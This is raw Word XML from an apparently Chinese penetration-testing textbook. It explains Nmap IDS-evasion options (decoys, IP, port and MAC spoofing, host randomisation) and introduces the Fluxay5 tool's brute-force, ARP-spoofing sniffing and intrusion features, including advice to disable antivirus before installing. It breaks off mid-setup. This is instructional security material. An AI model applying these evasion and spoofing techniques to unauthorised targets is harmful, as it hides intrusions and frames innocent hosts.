    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-D &lt;decoy1 [，decoy2][，ME]，...&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为使诱饵扫描起作用，需要使远程主机认为是诱饵在扫描目标网络。IDS可能会报个某个IP的5-10个端口扫描，但并不知道哪个IP在扫描以及哪些不是诱饵。但这种方式可以通过路由跟踪、响应丢弃以及其它主动机制在解决。这是一种常用的隐藏自身IP地址的有效技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用逗号分隔每个诱饵主机，也可用自己的真实IP作为诱饵，这时可使用 ME选项说明。如果在第6个位置或 更后的位置使用ME选项，一些常用端口扫描检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>器(如Solar Designer's excellent scanlogd)就不会报告这个真实IP。如果不使用ME选项，Nmap将真实IP放在一个随机的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，作为诱饵的主机须在工作状态，否则会导致目标主机的SYN洪水攻击。如果在网络中只有一个主机在工作，那就很容易确定哪个主机在扫描。也可使用IP地址代替主机名(被诱骗的网络就不可能在名字服务器日志中发现)。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>诱饵可用在初始的ping扫描(ICMP、SYN、ACK等)阶段或真正的端口扫描阶段。诱饵也可以用于远程操作系统检测(-O)。在进行版本检测或TCP连接扫描时，诱饵无效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用过多的诱饵没有任何价值，反而导致扫描变慢并且结果不准确。此外，一些ISP会过滤哄骗的报文，但很多对欺骗IP包没有任何限制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="92" w:name="_Toc496014458"/>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源地址哄骗</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-S &lt;IP_Address&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某些情况下，Nmap可能无法确定你的源地址(如果这样，Nmap会给出提示)。此时，使用-S选项并说明所需发送包的接口IP地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个标志的另一个用处是哄骗性的扫描，使得目标认为是另一个地址在进行扫描。可以想象某一个竞争对手在不断扫描某个公司！ -e选项常在这种情况下使用，也可采用-P0选项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="93" w:name="_Toc496014460"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 源端口哄骗</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--source-port &lt;portnumber&gt;; -g &lt;portnumber&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅依赖于源端口号就信任数据流是一种常见的错误配置，这个问题非常好理解。例如一个管理员部署了一个新的防火墙，但招来了很多用户的不满，因为他们的应用停止工作了。可能是由于外部的UDP DNS服务器响应无法进入网络，而导致DNS的崩溃。FTP是另一个常见的例子，在FTP传输时，远程服务器尝试和内部用建立连接以传输数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对这些问题有安全解决方案，通常是应用级代理或协议分析防火墙模块。但也存在一些不安全的方案。注意到DNS响应来自于53端口，FTP连接来自于20端口，很多管理员会掉入一个陷阱，即允许来自于这些端口的数据进入网络。他们认为这些端口里不会有值得注意的攻击和漏洞利用。此外，管理员或许认为这是一个短期的措施，直至他们采取更安全的方案。但他们忽视了安全的 升级。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不仅仅是工作量过多的网络管理员掉入这种陷阱，很多产品本身也会有这类不安全的隐患，甚至是微软的产品。Windows 2000和Windows XP中包含的IPsec过滤器也包含了一些隐含规则，允许所有来自88端口(Kerberos)的TCP和UDP数据流。另一个常见的例子是Zone Alarm个人防火墙到2.1.25版本仍然允许源端口53(DNS)或 67(DHCP)的UDP包进入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nmap提供了-g和--source-port选项(它们是等价的)，用于利用上述弱点。只需要提供一个端口号，Nmap就可以从这些端口发送数据。为使特定的操作系统正常工作，Nmap必须使用不同的端口号。DNS请求会忽略--source-port选项，这是因为Nmap依靠系统库来处理。大部分TCP扫描，包括SYN扫描，可以完全支持这些选项，UDP扫描同样如此。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="94" w:name="_Toc496014461"/>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送报文时附加随机数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--data-length &lt;number&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常情况下，Nmap发送最少的报文，只含一个包头。因此TCP包通常是40字节，ICMP ECHO请求只有28字节。这个选项告诉Nmap在发送的报文上附加指定数量的随机字节。操作系统检测(-O)包不受影响，但大部分ping和端口扫描包受影响，这会使处理变慢，但对扫描的影响较小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="95" w:name="_Toc496014463"/>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对目标主机的顺序随机排列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--randomize-hosts </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告诉Nmap在扫描主机前对每个组中的主机随机排列，最多可达 8096个主机。</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这会使得扫描针对不同的网络监控系统来说变得不是很 明显，特别是配合值较小的时间选项时更有效。如果需要对一个较大 的组进行随机排列，需要增大nmap.h文件中 PING-GROUP-SZ的值，并重新编译。另一种方法是使用列表扫描 (-sL -n -oN &lt;filename&gt;)，产生目标IP的列表，使用Perl脚本进行随机化，然后使用-iL提供给Nmap。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="96" w:name="_Toc496014464"/>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAC地址哄骗</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--spoof-mac &lt;mac address，prefix，or vendor name&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求Nmap在发送原以太网帧时使用指定的MAC地址，这个选项隐含了 --send-eth选项，以保证Nmap真正发送以太网包。MAC地址有几 种格式。如果简单地使用字符串“0”，Nmap选择一个完全随机的MAC 地址。如果给定的字符品是一个16进制偶数(使用:分隔)，Nmap将使用这个MAC地址。 如果是小于12的16进制数字，Nmap会随机填充剩下的6个字节。如果参数不是0或16进 制字符串，Nmap将通过nmap-mac-prefixes查找 厂商的名称(大小写区分)，如果找到匹配，Nmap将使用厂商的OUI(3字节前缀)，然后随机填充剩余的3个节字。正确的--spoof-mac参数有， Apple， 0，01:02:03:04:05:06，deadbeefcafe，0020F2，和Cisco.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc499884726"/>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流光Fluxay</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00832CE1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc499884727"/>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流光5是一款国产免费、功能强大的渗透测试工具， 不仅具有完善的扫描功能，而且自带了很多猜解器和入侵工具，可以方便的利用扫描到的漏洞进行入侵。 除此之外，流光利用C</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>/S</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构设计的扫描思想也能适应众多复杂的应用场合。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流光5的主要功能包括：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>POP3、FTP、IMAP、TELNET、MSSQL、MYSQL、WEB、IPC、RPC、DAEMON等</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>POP3/FTP/IMAP/HTTP/PROXY/MSSQL/SMB/WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的暴力破解功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络嗅探：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>欺骗，对交换环境下的局域网内主机进行嗅探。和流光的漏洞扫描模块一样，网络嗅探也采用了</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>C/S</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结构，可以提供远程网络的嗅探功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透工具：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>SQLCMD/NTCMD/SRV/TCP Relay等得心应手的辅助渗透工具。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字典工具：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以定制各种各样的字典文件，为暴力破解提供高效可用的字典。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杂项工具：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>PcAnyWhere</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码文件的解码等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装注意事项：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭防火墙：在下载安装Fluxay</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，要先关闭防火墙以免防毒软件将Fluxay</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的某些组件当做病毒而拒之门外、甚至删除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册组件：在流光的安装目录下</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>C:\Program Files\NetXeyes\Fluxay5Beta1\)</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，有一个目录</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>OCX,</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在此目录中有一个文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>register.bat</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个文件是用于注册组件的，以保证流光中的某些组件功能能够正常使用。执行成功以后，会有如下提示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D72706A" wp14:editId="0A4F7917">
            <wp:extent cx="2847619" cy="123809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47619" cy="1238095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置密钥：流光中的漏洞扫描采用了</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>C/S结构，其间通过TCP进行通讯，通讯的数据通过3DES进行加密，所以在使用前需要设置一个密钥。</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在正常情况下，当第一次使用流光的时候，系统会自动提示输入密钥：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25E50E05" wp14:editId="5F57A52A">
            <wp:extent cx="4104762" cy="193333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04762" cy="1933333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装本地扫描引擎：非必须，除非本地的扫描引擎需要为远程的流光提供扫描服务。安装方法：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Tools]-&gt;Fluxay Sensor Tools-&gt;Install Fluxay Sensor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="406823CF" wp14:editId="76329716">
            <wp:extent cx="4695238" cy="359047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95238" cy="3590476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Host IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
